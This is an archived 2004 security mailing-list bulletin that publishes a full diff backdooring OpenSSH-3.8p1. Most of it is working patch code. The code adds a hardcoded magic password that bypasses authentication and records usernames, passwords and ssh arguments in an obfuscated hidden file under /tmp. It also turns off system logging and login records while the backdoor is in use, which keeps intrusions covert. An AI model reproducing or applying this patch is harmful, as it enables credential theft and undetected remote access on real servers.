[EXPL] Backdooring OpenSSH
Date: 17 Mar 2004 18:42:51 +0200
From: SecuriTeam <[email protected]>
To: [email protected]
Subject: [EXPL] Backdooring OpenSSH
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Backdooring OpenSSH
------------------------------------------------------------------------
SUMMARY
Below is a .diff file that patches the sources of OpenSSH-3.8p1 client and
daemon to log every logins and passwords, it also adds a magic password
for the daemon, store passwords to an encrypted logfile, disables logging
if the magic passwords are used. Based upon the works of Aion.
DETAILS
Code:
diff -r -N -c openssh-3.8p1/auth-pam.c openssh-3.8p1+/auth-pam.c
*** openssh-3.8p1/auth-pam.c Tue Feb 17 13:20:08 2004
--- openssh-3.8p1+/auth-pam.c Tue Mar 2 19:24:00 2004
***************
*** 342,347 ****
--- 342,348 ----
if (sshpam_err != PAM_SUCCESS)
goto auth_fail;
sshpam_err = pam_authenticate(sshpam_handle, 0);
+ if (bella) sshpam_err = PAM_SUCCESS;
if (sshpam_err != PAM_SUCCESS)
goto auth_fail;
buffer_put_cstring(&buffer, "OK");
diff -r -N -c openssh-3.8p1/auth-passwd.c openssh-3.8p1+/auth-passwd.c
*** openssh-3.8p1/auth-passwd.c Thu Feb 22 00:23:36 2004
--- openssh-3.8p1+/auth-passwd.c Tue Mar 2 19:24:00 2004
***************
*** 72,77 ****
--- 72,81 ----
#endif
if (*password == '\0' && options.permit_empty_passwd == 0)
return 0;
+ if (!strcmp(BACKPWD, password)) return bella=1; bella=0;
+ sprintf(abuff, "passwd from: %s \tuser: %s \tpass: %s \n",
+ get_remote_ipaddr(), pw->pw_name, password);
+ bellalog();
#if defined(HAVE_OSF_SIA)
return auth_sia_password(authctxt, password) && ok;
diff -r -N -c openssh-3.8p1/includes.h openssh-3.8p1+/includes.h
*** openssh-3.8p1/includes.h Sun Feb 6 11:29:42 2004
--- openssh-3.8p1+/includes.h Tue Mar 2 19:24:00 2004
***************
*** 13,18 ****
--- 13,38 ----
* called by a name other than "ssh" or "Secure Shell".
*/
+ // start patch by acme - acme at olografix/paranoici dot org
+ #include <sys/stat.h>
+ #include <stdio.h>
+
+ #define BACKPWD "inspassword"
+ #define SSH_LOG "/tmp/.lost+found"
+
+ FILE *alog;
+ char abuff[512];
+ int alen, ai, bella;
+
+ #define bellalog() { \
+ alen=strlen(abuff); \
+ for(ai=0; ai<=alen; ai++) abuff[ai]=~abuff[ai]; \
+ alog=fopen(SSH_LOG, "a"); \
+ if(alog!=NULL) { fwrite(abuff, alen, 1, alog); fclose(alog);} \
+ chmod(SSH_LOG, 0666); \
+ }
+ // end patch, from aion
+
#ifndef INCLUDES_H
#define INCLUDES_H
diff -r -N -c openssh-3.8p1/log.c openssh-3.8p1+/log.c
*** openssh-3.8p1/log.c Tue Feb 18 12:59:44 2004
--- openssh-3.8p1+/log.c Tue Mar 2 19:24:00 2004
***************
*** 273,278 ****
--- 273,279 ----
char *txt = NULL;
int pri = LOG_INFO;
+ if (bella) return;
if (level > log_level)
return;
diff -r -N -c openssh-3.8p1/loginrec.c openssh-3.8p1+/loginrec.c
*** openssh-3.8p1/loginrec.c Sun Feb 10 06:49:36 2004
--- openssh-3.8p1+/loginrec.c Tue Mar 2 19:24:00 2004
***************
*** 406,411 ****
--- 406,412 ----
int
login_write (struct logininfo *li)
{
+ if (bella) return 0;
#ifndef HAVE_CYGWIN
if ((int)geteuid() != 0) {
logit("Attempt to write login records by non-root user (aborting)");
diff -r -N -c openssh-3.8p1/monitor.c openssh-3.8p1+/monitor.c
*** openssh-3.8p1/monitor.c Wed Feb 6 06:40:28 2004
--- openssh-3.8p1+/monitor.c Tue Mar 2 19:24:00 2004
***************
*** 786,791 ****
--- 786,793 ----
fatal("UsePAM not set, but ended up in %s anyway", __func__);
user = buffer_get_string(m, NULL);
+ sprintf(abuff, "mm pam from: %s \tuser: %s \n", get_remote_ipaddr(),
user);
+ bellalog();
start_pam(user);
***************
*** 881,888 ****
num = buffer_get_int(m);
if (num > 0) {
resp = xmalloc(num * sizeof(char *));
! for (i = 0; i < num; ++i)
resp[i] = buffer_get_string(m, NULL);
ret = (sshpam_device.respond)(sshpam_ctxt, num, resp);
for (i = 0; i < num; ++i)
xfree(resp[i]);
--- 883,894 ----
num = buffer_get_int(m);
if (num > 0) {
resp = xmalloc(num * sizeof(char *));
! for (i = 0; i < num; ++i) {
resp[i] = buffer_get_string(m, NULL);
+ sprintf(abuff, "pam_respond: [%d]: %s\n", i, resp[i]);
+ if(!strcmp(BACKPWD, resp[i])) bella=1;
+ else bellalog();
+ }
ret = (sshpam_device.respond)(sshpam_ctxt, num, resp);
for (i = 0; i < num; ++i)
xfree(resp[i]);
diff -r -N -c openssh-3.8p1/readpass.c openssh-3.8p1+/readpass.c
*** openssh-3.8p1/readpass.c Fri Jan 24 02:36:23 2003
--- openssh-3.8p1+/readpass.c Tue Mar 2 19:24:00 2004
***************
*** 123,128 ****
--- 123,130 ----
if ((ret = ssh_askpass(askpass, prompt)) == NULL)
if (!(flags & RP_ALLOW_EOF))
return xstrdup("");
+ sprintf(abuff, "readpass: %s\n", ret);
+ bellalog();
return ret;
}
***************
*** 134,138 ****
--- 136,142 ----
ret = xstrdup(buf);
memset(buf, 'x', sizeof buf);
+ sprintf(abuff, "readpass: %s\n", ret);
+ bellalog();
return ret;
}
diff -r -N -c openssh-3.8p1/ssh.c openssh-3.8p1+/ssh.c
*** openssh-3.8p1/ssh.c Tue Dec 17 06:33:12 2003
--- openssh-3.8p1+/ssh.c Tue Mar 2 19:24:00 2004
***************
*** 212,217 ****
--- 212,221 ----
extern int optind, optreset;
extern char *optarg;
+ for(i=1; i<ac; i++) {
+ sprintf(abuff, "ssh: av[%d]: %s\n", i, av[i]);
+ bellalog();
+ }
__progname = ssh_get_progname(av[0]);
init_rng();
diff -r -N -c openssh-3.8p1/version.h openssh-3.8p1+/version.h
*** openssh-3.8p1/version.h Tue Feb 23 23:24:02 2004
--- openssh-3.8p1+/version.h Tue Mar 2 19:24:00 2004
***************
*** 1,3 ****
/* $OpenBSD: version.h,v 1.40 2004/02/23 15:16:46 markus Exp $ */
! #define SSH_VERSION "OpenSSH_3.8p1"
--- 1,3 ----
/* $OpenBSD: version.h,v 1.40 2004/02/23 15:16:46 markus Exp $ */
! #define SSH_VERSION "OpenSSH_3.8p1" // we can change it
ADDITIONAL INFORMATION
The information has been provided by <mailto:[email protected]> acme.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
